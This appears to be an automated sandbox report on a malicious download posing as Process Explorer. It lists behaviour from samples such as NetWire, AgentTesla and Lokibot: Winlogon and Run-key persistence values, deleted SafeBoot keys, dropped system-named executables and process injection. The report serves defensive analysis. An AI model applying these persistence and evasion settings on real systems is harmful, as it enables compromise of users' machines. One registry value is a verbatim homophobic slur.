Analysis Overview
Threat Level: Known bad
The file https://www.majorgeeks.com/files/details/microsoft_process_explorer.html was found to be: Known bad.
Malicious Activity Summary
ModiLoader, DBatLoader
Netwire
Modifies WinLogon for persistence
ModiLoader First Stage
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Sets service image path in registry
Downloads MZ/PE file
Obfuscated with Agile.Net obfuscator
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
UPX packed file
Impair Defenses: Safe Mode Boot
Adds Run key to start application
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Modifies WinLogon
Abuse Elevation Control Mechanism: Bypass User Account Control
Blocklisted process makes network request
Drops file in System32 directory
Suspicious use of SetThreadContext
Subvert Trust Controls: Mark-of-the-Web Bypass
Drops file in Program Files directory
Drops file in Windows directory
Browser Information Discovery
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of SetWindowsHookEx
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Suspicious behavior: MapViewOfSection
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
Modifies Internet Explorer start page
Suspicious behavior: EnumeratesProcesses
Modifies registry key
Suspicious behavior: LoadsDriver
Checks processor information in registry
Script User-Agent
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-09-02 20:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-09-02 20:03
Reported
2024-09-02 20:21
Platform
win10v2004-20240802-en
Max time kernel
1031s
Max time network
1039s
Command Line
Signatures
ModiLoader, DBatLoader
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit32.exe" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Netwire
ModiLoader First Stage
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\system32\Drivers\PROCEXP152.SYS | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\spoclsv.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Gnil.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Executes dropped EXE
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Loads dropped DLL
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Abuse Elevation Control Mechanism: Bypass User Account Control
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost32 = "C:\\Windows\\system32\\dllhost32.exe" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Qspt = "C:\\Users\\Admin\\AppData\\Local\\Qspt\\Qspt.hta" | C:\Users\Admin\Desktop\NetWire.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\msiexec.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies WinLogon
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DefaultUserName = "COCK_SUCKING_FAGGOT" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AltDefaultUserName = "COCK_SUCKING_FAGGOT" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\windows\SysWOW64\wuauclt.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chcp.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\dumprep.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\imapi.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\logon.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\systray.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntkrnlpa.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\bootok.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ctfmon.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\MDM.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\alg.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntoskrnl.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\bootok.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\MDM.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\services.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\regedit.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dumprep.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\wowexec.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wuauclt.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\wntdll.pdb | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\services.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\win.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\progman.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chkntfs.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\alg.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\chcp.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\imapi.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wowexec.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\WINDOWS\SysWOW64\userinit.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\progman.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\shutdown.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntkrnlpa.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\logon.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\recover.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\win.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntoskrnl.exe:Zone.Identifier:$DATA | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\autochk.exe | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 6596 set thread context of 6328 | N/A | C:\Users\Admin\Desktop\NetWire.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
| PID 5184 set thread context of 5896 | N/A | C:\Users\Admin\Desktop\NetWire.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
| PID 5908 set thread context of 6400 | N/A | C:\Users\Admin\Desktop\NetWire.exe | C:\Program Files (x86)\internet explorer\ieinstal.exe |
| PID 6392 set thread context of 5812 | N/A | C:\Users\Admin\Downloads\Lokibot.exe | C:\Users\Admin\Downloads\Lokibot.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.xml | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\Microsoft.Management.Infrastructure.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.xml | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe.config | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\VDFParser.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files\Common Files\System\symsrv.dll | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignThemes.Wpf.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\SharpSteam.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\System.Management.Automation.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\UWPHook.exe | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| File created | C:\Program Files (x86)\Briano\UWPHook\MaterialDesignColors.dll | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\NOTEPAD.EXE | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Fagot.a.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\MadMan.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Mabezat.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Gnil.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Mabezat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Lokibot.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Gnil.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\AgentTesla.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Notepad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\Floxif.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\NetWire.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
